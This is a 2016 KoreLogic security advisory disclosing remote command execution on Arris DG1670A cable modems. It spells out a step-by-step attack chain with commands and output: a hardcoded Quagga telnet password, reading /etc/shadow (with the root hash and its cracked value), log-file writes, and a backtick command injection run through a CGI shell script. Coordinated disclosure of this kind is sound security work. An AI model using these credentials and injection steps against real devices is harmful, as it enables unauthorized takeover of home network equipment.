Skip to main content
Security Advisory

Arris DG1670A Cable Modem Remote Command Execution

Advisory ID
KL-001-2016-001
Published
2016-02-12
Vendor
Arris

Affected Systems

Product
Cable Modem
Version
DG1670A, TG1670
Platform
Embedded Linux

Discovered By

Matt Bergin, Hank Leininger (KoreLogic)
Download (signed .txt)
Back to Advisories

Vulnerability Details

Affected Vendor: Arris
Affected Product: Cable Modem
Affected Version: DG1670A, TG1670
Platform: Embedded Linux
CWE Classification: CWE-73: External Control of File Name or Path, CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection'), CWE-522: Insufficiently Protected Credentials
Impact: Arbitrary Code Execution
Attack Vector: Telnet

Vulnerability Description

The Arris DG1670A leverages a combination of technologies to deliver the product functionality. Combining several of these technologies in an unanticipated way will allow an attacker to execute arbitrary commands on the underlying operating system as the most privileged user.

Technical Description

Use the password: `JhAkuo18`

On August 28, 2015 a user on GitHub by the name of
GuerrillaWarfare posted a new repository named Junkyard. The
repository had firmware images for popular cable modems.

Repository: https://github.com/GuerrillaWarfare/Junkyard Filename: TS0801102P_100714_NA.16XX.GW.ATOM.img

Below is the directory content of the squashfs-root directory
contained within the image:
# ls
bin  etc  gw.fsname  include  linuxrc  nvram  sbin     share  tmp  var      version
dev  fss  hdisk1     lib      mnt      proc   scripts  sys    usr  var.tar  vop
The default IP address assigned to Arris modems is 192.168.100.1
and is routable from networks where the modem is attached. Below
is a Nmap output of services listening on the default IP address:
# sudo nmap -T5 -sU -sT -p- 192.168.100.1
Nmap scan report for 192.168.100.1
Host is up (0.0053s latency).
PORT     STATE SERVICE  VERSION
80/tcp   open  http     lighttpd
443/tcp  open  ssl/http lighttpd
2602/tcp open  ripd?
8080/tcp open  http     lighttpd
A service listening on port 2602 is usually associated with
Quagga.  Going back to the squashfs-root directory, if we grep
through the content of this file system there are several .conf
files containing passwords. One of the files containing passwords
is `zebra.conf`, which can be used to authenticate to the Quagga
telnet console.
# grep -ri "password" *.conf|more
etc/default/ripngd.conf:password JhAkuo18
etc/default/zebra.conf:password JhAkuo18
etc/default/ripd.conf:password JhAkuo18
$ telnet 192.168.100.1 2602
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'.

Hello, this is Quagga (version 0.99.16).
Copyright 1996-2005 Kunihiro Ishiguro, et al.


User Access Verification

Password:
PROMPT>
Entering a '?' at any point gives context-sensitive help text.
There are several layers of 'privilege' though there are no
restrictions on elevating on this device.  Quagga is an
open-source routing daemon commonly found in routers, access
points, and modems. In the case described, it has been implemented
on a cable modem to facilitate route provisioning from local ISP
to the public internet.
PROMPT> ?
  echo      Echo a message back to the vty
  enable    Turn on privileged mode command
  exit      Exit current mode and down to previous mode
  help      Description of the interactive help system
  list      Print command list
  quit      Exit current mode and down to previous mode
  show      Show running system information
  terminal  Set terminal line parameters
  who       Display who is on vty
PROMPT> enable
PROMPT# ?
  clear      Reset functions
  configure  Configuration from vty interface
  copy       Copy configuration
  debug      Debugging functions (see also 'undebug')
  disable    Turn off privileged mode command
  echo       Echo a message back to the vty
  end        End current mode and change to enable mode.
  exit       Exit current mode and down to previous mode
  help       Description of the interactive help system
  list       Print command list
  logmsg     Send a message to enabled logging destinations
  no         Negate a command or set its defaults
  quit       Exit current mode and down to previous mode
  show       Show running system information
  terminal   Set terminal line parameters
  who        Display who is on vty
  write      Write running configuration to memory, network, or terminal
PROMPT# configure ?
  terminal  Configuration terminal
PROMPT# configure terminal
PROMPT(config)# ?
  access-list  Add an access list entry
  banner       Set banner string
  debug        Debugging functions (see also 'undebug')
  enable       Modify enable password parameters
  end          End current mode and change to enable mode.
  exit         Exit current mode and down to previous mode
  help         Description of the interactive help system
  hostname     Set system's network name
  interface    Select an interface to configure
  ip           IP information
  ipv6         IPv6 information
  key          Authentication key management
  line         Configure a terminal line
  list         Print command list
  log          Logging control
  no           Negate a command or set its defaults
  password     Assign the terminal connection password
  quit         Exit current mode and down to previous mode
  route-map    Create route-map or enter route-map command mode
  router       Enable a routing process
  service      Set up miscellaneous service
  show         Show running system information
  write        Write running configuration to memory, network, or terminal
The service message of the day banner can be abused to allow for
arbitrary file reading. Also, the logging mechanism can be abused
to allow for meaningful writes. The combination of these factors,
along with a lack of shell metacharacter filtering, will be used
to obtain remote command execution.
PROMPT(config)# banner motd file ?
  file  Banner from a file
PROMPT(config)# log file ?
  FILENAME  Logging filename
PROMPT(config)# exit
PROMPT# log notifications ?
  MESSAGE  The message to send
Reading arbitrary files:
PROMPT(config)# banner motd file /etc/shadow

# telnet 192.168.100.1 2602
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'.
root:$1$xQWhDWOr$FYNAc2DuT2Q45OY7s2R43/:10063:0:99999:7:::

User Access Verification

Password:
This password hash cracks to the word arris.

Meaningful file writes:
PROMPT# configure terminal
PROMPT(config)# banner motd file /var/tmp/kore-log.txt
PROMPT(config)# log file /var/tmp/kore-log.txt
PROMPT(config)# exit
PROMPT# log notifications KORELOGIC

# telnet 192.168.100.1 2602
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'.
2015/09/10 07:16:50 RIP: KORELOGIC

User Access Verification

Password:
It appears as though we can write to files. Further testing,
confirmed that file permissions (and read-only mounted filesystems)
heavily restrict the locations where writing is allowed.

There are several shell scripts in the web root.
# ls -la usr/www/*.sh
lrwxrwxrwx 1 root root 18 Sep  5 04:55 usr/www/guioff.sh -> /var/tmp/guioff.sh
lrwxrwxrwx 1 root root 17 Sep  5 04:55 usr/www/guion.sh -> /var/tmp/guion.sh

# cat var/tmp/guion.sh
echo 1 > /nvram/8/guiflag

# cat var/tmp/guioff.sh
echo 0 > /nvram/8/guiflag
The `lighttpd.conf` file indicates there is a handler defined for
shell scripts.
#ARRIS CHANGE BEGIN
#### CGI module
cgi.assign                = ( ".pl"  => "/usr/bin/perl",
                              ".cgi" => "/usr/bin/perl",
                              ".sh"  => "/bin/sh",
                              "/walk"  => "/fss/gw/usr/bin/web2snmp",
                               "/snmpSet" => "/fss/gw/usr/bin/web2snmp",
                               "/snmpGet" => "/fss/gw/usr/bin/web2snmp",
                               "/login" => "/fss/gw/usr/bin/web2snmp",
                               "/backup" => "/fss/gw/usr/bin/web2snmp",
                               "/restore" => "/fss/gw/usr/bin/web2snmp",
                               "/hsd" => "/fss/gw/usr/bin/web2snmp",
                               "/setPassword" => "/fss/gw/usr/bin/web2snmp",
# UNIHAN ADD START
                               "/storelog" => "/fss/gw/usr/bin/web2snmp",
                               "/checkPassword" => "/fss/gw/usr/bin/web2snmp"
# UNIHAN ADD END
                            )
PROMPT# configure terminal
PROMPT(config)# log file /var/tmp/guion.sh
PROMPT(config)# exit
PROMPT# log notifications | `/bin/busybox uname -a >> /var/tmp/shell.txt 2>&1`
PROMPT# configure terminal
PROMPT(config)# banner motd file /var/tmp/shell.txt
Followed by a GET request:
GET /guion.sh HTTP/1.1
Host: 192.168.100.1:8080
User-Agent: Mozilla/5.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Connection: close
And response:
HTTP/1.1 200 OK
Content-Length: 0
Date: Wed, 09 Sep 2015 20:28:55 GMT
Server: lighttpd
Now we telnet:
$ telnet 192.168.100.1 2602
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'.
Linux ARRISGW 2.6.39.3 #1 PREEMPT Thu Nov 6 14:56:21 EST 2014 armv6b GNU/Linux

User Access Verification

Password:
Note that the current upstream version of Quagga does not appear
to be affected (tested against Quagga 0.99.24.1).  First, the
daemon runs with dropped privileges for operations like reading
the motd file or writing logs.  So, `banner motd` cannot read a
root-only file such as `/etc/shadow`, and `log file
/root/.ssh/authorized_keys` (for example) cannot write to a
root-only file.  Furthermore, in the scenario outlined here,
triggering the shell commands written to the logfile required
an additional moving part - the lighttpd server - which is not
included in a Quagga install.

Mitigation and Remediation Recommendation

The vendor has issued a patch for this vulnerability. KoreLogic wishes to thank Arris for their cooperation and attention to this issue.

Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) and Hank Leininger of KoreLogic, Inc.

Proof of Concept

N/A

The contents of this advisory are copyright(c) 2016 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

Disclosure Timeline

KoreLogic sends vulnerability report and PoC to Arris.

Arris acknowledges receipt of vulnerability report.

Arris contacts KoreLogic to obtain additional details.

Arris updates KoreLogic indicating they are working on a fix.

Arris contacts KoreLogic to discuss the patch timeline.

Arris contacts KoreLogic to discuss the patch timeline.

KoreLogic requests CVE from Mitre.

KoreLogic contacts Arris to ensure patch is ready for release.

KoreLogic requests CVE from Mitre.

KoreLogic requests CVE from Mitre.

Arris informs KoreLogic that the patch has been released to subscribers.

Coordinated Public Disclosure.

Back to Advisories

Responsible Disclosure

KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.

Vendor notification and coordination
90+ day disclosure timeline
CVE coordination when applicable

Resources & Downloads

Contact Security Team
All Advisories Download signed .txt